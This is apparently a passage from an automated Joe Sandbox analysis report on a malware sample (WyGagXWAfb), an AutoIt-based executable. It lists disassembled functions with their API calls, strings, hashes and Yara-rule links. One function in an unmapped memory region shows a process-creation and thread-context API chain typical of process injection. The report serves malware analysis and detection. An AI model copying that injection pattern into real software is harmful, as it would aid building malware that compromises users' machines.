Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 2a280558dd22687549000df67adf90883f16b4fb2eedc744e15c4f1d2845780e
Instruction ID: bfd7d2acd04a46afaa100b2ec7559b298db7fcdf5ef34ab383fdc1f88bd91b75
Opcode Fuzzy Hash: 2a280558dd22687549000df67adf90883f16b4fb2eedc744e15c4f1d2845780e
Instruction Fuzzy Hash: CA214D75D02305AFDB109FA4ED59B9DBBF4FB08711F10016BE504A72A0EBBA5A548F44

Function 00B13633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00B136D2
KillTimer.USER32(?,00000001), ref: 00B136FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B1371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B1372A
CreatePopupMenu.USER32 ref: 00B1373E
PostQuitMessage.USER32(00000000), ref: 00B1375F

Strings

TaskbarCreated, xrefs: 00B13725

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: b9604221bfb76d2f597877f5edd7aa131cf6a3d9c679ebb83cfc89ef40d57cc7
Instruction ID: 2013ff3059db5a8259fed834cefb75d639582e6fd4a4c5c36035db52f19d8b29
Opcode Fuzzy Hash: b9604221bfb76d2f597877f5edd7aa131cf6a3d9c679ebb83cfc89ef40d57cc7
Instruction Fuzzy Hash: D04125B2208105BBDB145F68EC49BFE77E5EB01B00F9401ABF502D32E1FE659E90A765

Function 00B13778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON

Download Yara Rule

Strings

CMDLINERAW, xrefs: 00B1380D
/AutoIt3ExecuteScript, xrefs: 00B138CE
CMDLINE, xrefs: 00B13834
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00B137C0
/AutoIt3OutputDebug, xrefs: 00B138A4
/AutoIt3ExecuteLine, xrefs: 00B138B9
/ErrorStdOut, xrefs: 00B1388F

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
API String ID: 1825951767-3513169116
Opcode ID: 5a44135bbd568151ecd4c1804bd79d5b89ab004c0977ecf89cfdded43b1b653f
Instruction ID: 9a101056e45af69df84f7c5638b260231a878e5d6402ae6a072d7b0d22693633
Opcode Fuzzy Hash: 5a44135bbd568151ecd4c1804bd79d5b89ab004c0977ecf89cfdded43b1b653f
Instruction Fuzzy Hash: 65A14F729102599ACF04EBA0CC95AEEB7F9BF14700F9404BAE416B7191EF749A49CB60

Function 01E925E0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01E926B1
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01E928D7

Memory Dump Source

Source File: 00000000.00000002.1710854008.0000000001E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e90000_WyGagXWAfb.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
Instruction ID: bc35bc4b81b68010ef15cb5711d6d66c2dd07b796e2f6ccb42ec7273a16f0b1e
Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
Instruction Fuzzy Hash: B9A1F774E0020AEBDF14DFA4C994BEEBBB5BF48304F209559E601BB281D7759A81CB94

Function 00B139E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00B13A15
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B13A36
ShowWindow.USER32(00000000,?,?), ref: 00B13A4A
ShowWindow.USER32(00000000,?,?), ref: 00B13A53

Strings

edit, xrefs: 00B13A30
AutoIt v3, xrefs: 00B13A0D, 00B13A12, 00B13A13

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 66260c54ac89d408584b30fc4b100721888d2e088a63f58179aa0709a76b6c5a
Instruction ID: a6d90d5d9e64480c1656c4456c3fedea6fd170fd7adba700b39e75e0ca2a7604
Opcode Fuzzy Hash: 66260c54ac89d408584b30fc4b100721888d2e088a63f58179aa0709a76b6c5a
Instruction Fuzzy Hash: 11F03A716022907EEE301B636C58E776F7DD7C6F60B00402BB900E3170DAA60800CAB4

Function 01E923B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 147fileCOMMON

Download Yara Rule

APIs

Part of subcall function 01E922A0: Sleep.KERNELBASE(000001F4), ref: 01E922B1

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01E924D9

Strings

PS442Z6Q7YR1DIO11PW1E43236I, xrefs: 01E9253C, 01E9253F

Memory Dump Source

Source File: 00000000.00000002.1710854008.0000000001E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e90000_WyGagXWAfb.jbxd

Similarity

API ID: CreateFileSleep
String ID: PS442Z6Q7YR1DIO11PW1E43236I
API String ID: 2694422964-4090999618
Opcode ID: d4716d9da22efab8ce5eae072eb66d82ee7c76550d44e2db230606e7fd901fa5
Instruction ID: 6fce1e758ec9fe27a38e5f5b3a2718d555228ddff407cc69f4b6a4924dcd68a3
Opcode Fuzzy Hash: d4716d9da22efab8ce5eae072eb66d82ee7c76550d44e2db230606e7fd901fa5
Instruction Fuzzy Hash: 1451B730D04289EAEF11D7F4C818BEEBBB89F19304F044199E6497B2C1D7B51B45CB66

Function 00B169CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00B14F3D: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00BD62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00B14F6F

_free.LIBCMT ref: 00B4E68C
_free.LIBCMT ref: 00B4E6D3

Part of subcall function 00B16BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00B16D0D

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00B4E462
Bad directive syntax error, xrefs: 00B4E6BB

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: fe35444ebab3848dd49a76a3867b85510898437589188739f9d65a19b8f59495
Instruction ID: 4695f0669803fc65e09131436ecb784a21304d42bfabeaff76da99ce30f25cc4
Opcode Fuzzy Hash: fe35444ebab3848dd49a76a3867b85510898437589188739f9d65a19b8f59495
Instruction Fuzzy Hash: 75914A71910219AFCF14EFA4C8919EDB7F4FF18314F5444AAF825AB2A1DB30EA45DB60

Function 00B135B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00B135A1,SwapMouseButtons,00000004,?), ref: 00B135D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00B135A1,SwapMouseButtons,00000004,?,?,?,?,00B12754), ref: 00B135F5
RegCloseKey.KERNELBASE(00000000,?,?,00B135A1,SwapMouseButtons,00000004,?,?,?,?,00B12754), ref: 00B13617

Strings

Control Panel\Mouse, xrefs: 00B135D2

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 2aa8d91605e01bc4572f027b64df545e527d474cc40bdc75283d698bc1397f53
Instruction ID: c8d6395171123482f63a8a39e80a17a3dcadef87d366402c2bea3f1619ce4b4f
Opcode Fuzzy Hash: 2aa8d91605e01bc4572f027b64df545e527d474cc40bdc75283d698bc1397f53
Instruction Fuzzy Hash: CB114871614208BFDB208F64DC809FEB7FCEF44B50F4084AAE805D7210E6719E949760

Function 01E912A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 01E91A5B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01E91AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01E91B13

Memory Dump Source

Source File: 00000000.00000002.1710854008.0000000001E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e90000_WyGagXWAfb.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
Instruction ID: 406a9dc888957f0de9d08e44f9c11916496ce9b9ca29ff760bca537f035c338e
Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
Instruction Fuzzy Hash: 62621C30A14259DBEB24CFA4C850BDEB772EF58304F1091A9D20DEB394E7799E81CB59

Function 00B797E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00B15045: _fseek.LIBCMT ref: 00B1505D

Part of subcall function 00B799BE: _wcscmp.LIBCMT ref: 00B79AAE
Part of subcall function 00B799BE: _wcscmp.LIBCMT ref: 00B79AC1

_free.LIBCMT ref: 00B7992C
_free.LIBCMT ref: 00B79933
_free.LIBCMT ref: 00B7999E

Part of subcall function 00B32F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00B39C64), ref: 00B32FA9
Part of subcall function 00B32F95: GetLastError.KERNEL32(00000000,?,00B39C64), ref: 00B32FBB

_free.LIBCMT ref: 00B799A6

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: e4f60488476fe615de0f6a7d20413c4e96bda4cd78e6fb835dcbfd922386e42f
Instruction ID: 07912d4a78b6661aa11e7ec8e92b92b730111b73fd4c8c80e5646a916b20388f
Opcode Fuzzy Hash: e4f60488476fe615de0f6a7d20413c4e96bda4cd78e6fb835dcbfd922386e42f
Instruction Fuzzy Hash: F1515DB1904618AFDF249F64CC85AAEBBB9EF48310F1044EEB61DA7241DB715E80CF59

Function 00B3493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00B349D0
__flush.LIBCMT ref: 00B349F0
__write.LIBCMT ref: 00B34A23
__flsbuf.LIBCMT ref: 00B34A51

Part of subcall function 00B38D68: __getptd_noexit.LIBCMT ref: 00B38D68

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
Instruction ID: 10d18ff503d0c910d6c00670c2a269316c1e6fa13894ca7014bdfa623fac50b7
Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
Instruction Fuzzy Hash: 34418375640705AFDB288EA9C880AAF7BEAEF84360F3486ADE85587650D774BD408B44

Function 00B173E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B4EE62
GetOpenFileNameW.COMDLG32(?), ref: 00B4EEAC

Part of subcall function 00B148AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B148A1,?,?,00B137C0,?), ref: 00B148CE

Part of subcall function 00B309D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B309F4

Strings

X, xrefs: 00B4EE7A

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: e068e276fd79318624db73cb39a42880ebd728a6a658713d9a008d71f830d84d
Instruction ID: 2e8616015a412c89ef6b587246801392119cac7356f32348c0960936c060d8d3
Opcode Fuzzy Hash: e068e276fd79318624db73cb39a42880ebd728a6a658713d9a008d71f830d84d
Instruction Fuzzy Hash: 6021C371A102589BDB11DF94C845BEE7BF8AF49310F50409AE408E7281DFB89A898BA1

Function 00B79B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00B79B82
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00B79B99

Strings

aut, xrefs: 00B79B93

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 7fa24aedb71e809e1e0c8061320eae734de8cead496c49a80f301ff9b5cd8fb6
Instruction ID: e4fde37d8f6aa6698d1b3c7e4d935673deefc2e6d364944498e86c275a02705b
Opcode Fuzzy Hash: 7fa24aedb71e809e1e0c8061320eae734de8cead496c49a80f301ff9b5cd8fb6
Instruction Fuzzy Hash: 34D05E7994030EABDB109B90DC0EFAA776CE704704F0042A2BE54D21A1DEB055988B95

Function 00B8CDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f92db5ebe30e06fcf30f2dc35e62cd66a35f2857cd72bd1a543b964e00195eb4
Instruction ID: 3f9df1a3882e81420d712b0d91eaee946dda7acbcb8262858bc484d638d5623b
Opcode Fuzzy Hash: f92db5ebe30e06fcf30f2dc35e62cd66a35f2857cd72bd1a543b964e00195eb4
Instruction Fuzzy Hash: 60F16B706083419FC714EF28C494A6ABBE5FF88314F5489AEF8999B391D730E945CF82

Function 00B1F8CF Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 00B303A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B303D3
Part of subcall function 00B303A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00B303DB
Part of subcall function 00B303A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B303E6
Part of subcall function 00B303A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B303F1
Part of subcall function 00B303A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00B303F9
Part of subcall function 00B303A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00B30401

Part of subcall function 00B26259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00B1FA90), ref: 00B262B4

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00B1FB2D
OleInitialize.OLE32(00000000), ref: 00B1FBAA
CloseHandle.KERNEL32(00000000), ref: 00B549F2

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 661ebb6f12a12d536f9290c5e3c9ec451372fce5faafb9c94e5e803d02791eb8
Instruction ID: c15416ba547c47b9a8090983d091fd24083d813146d38039a3a5a550e20bccdd
Opcode Fuzzy Hash: 661ebb6f12a12d536f9290c5e3c9ec451372fce5faafb9c94e5e803d02791eb8
Instruction Fuzzy Hash: 2781A6B19062458EC388EF2DEAA5665FBE4FB9831871085BBD418C73A2FF358844CF54

Function 00B3594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00B35963

Part of subcall function 00B3A3AB: __NMSG_WRITE.LIBCMT ref: 00B3A3D2
Part of subcall function 00B3A3AB: __NMSG_WRITE.LIBCMT ref: 00B3A3DC

__NMSG_WRITE.LIBCMT ref: 00B3596A

Part of subcall function 00B3A408: GetModuleFileNameW.KERNEL32(00000000,00BD43BA,00000104,?,00000001,00000000), ref: 00B3A49A
Part of subcall function 00B3A408: ___crtMessageBoxW.LIBCMT ref: 00B3A548

Part of subcall function 00B332DF: ___crtCorExitProcess.LIBCMT ref: 00B332E5
Part of subcall function 00B332DF: ExitProcess.KERNEL32 ref: 00B332EE

Part of subcall function 00B38D68: __getptd_noexit.LIBCMT ref: 00B38D68

RtlAllocateHeap.NTDLL(010A0000,00000000,00000001,00000000,?,?,?,00B31013,?), ref: 00B3598F

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 356aff1ae56cfbb1f6eaaf592aef361febc831dd171c32b05c42ed03de949fbc
Instruction ID: a65f36d541b0131f35adfd84cdf70f69086fc88daed825b97adf08913ac82860
Opcode Fuzzy Hash: 356aff1ae56cfbb1f6eaaf592aef361febc831dd171c32b05c42ed03de949fbc
Instruction Fuzzy Hash: 2701D231201B11EFE6312B24DC52B6EB3C8DF51B30F7102BAF440AB191DE709D018261

Function 00B79B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00B797D2,?,?,?,?,?,00000004), ref: 00B79B45
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00B797D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00B79B5B
CloseHandle.KERNEL32(00000000,?,00B797D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00B79B62

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: e18f22149f36d7b3ad1d5eb89acceec822bfaf95b43571400b2ae1724d5e73ef
Instruction ID: 8d318376f337b634ae63e8af70447fccc671f792a6a646c4e16f74a135dd44d6
Opcode Fuzzy Hash: e18f22149f36d7b3ad1d5eb89acceec822bfaf95b43571400b2ae1724d5e73ef
Instruction Fuzzy Hash: 03E08632180225F7D7211B64EC09FDA7B58EB05771F208121FB25BA0E08BB1291197DC

Function 00B78F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00B78FA5

Part of subcall function 00B32F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00B39C64), ref: 00B32FA9
Part of subcall function 00B32F95: GetLastError.KERNEL32(00000000,?,00B39C64), ref: 00B32FBB

_free.LIBCMT ref: 00B78FB6
_free.LIBCMT ref: 00B78FC8

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
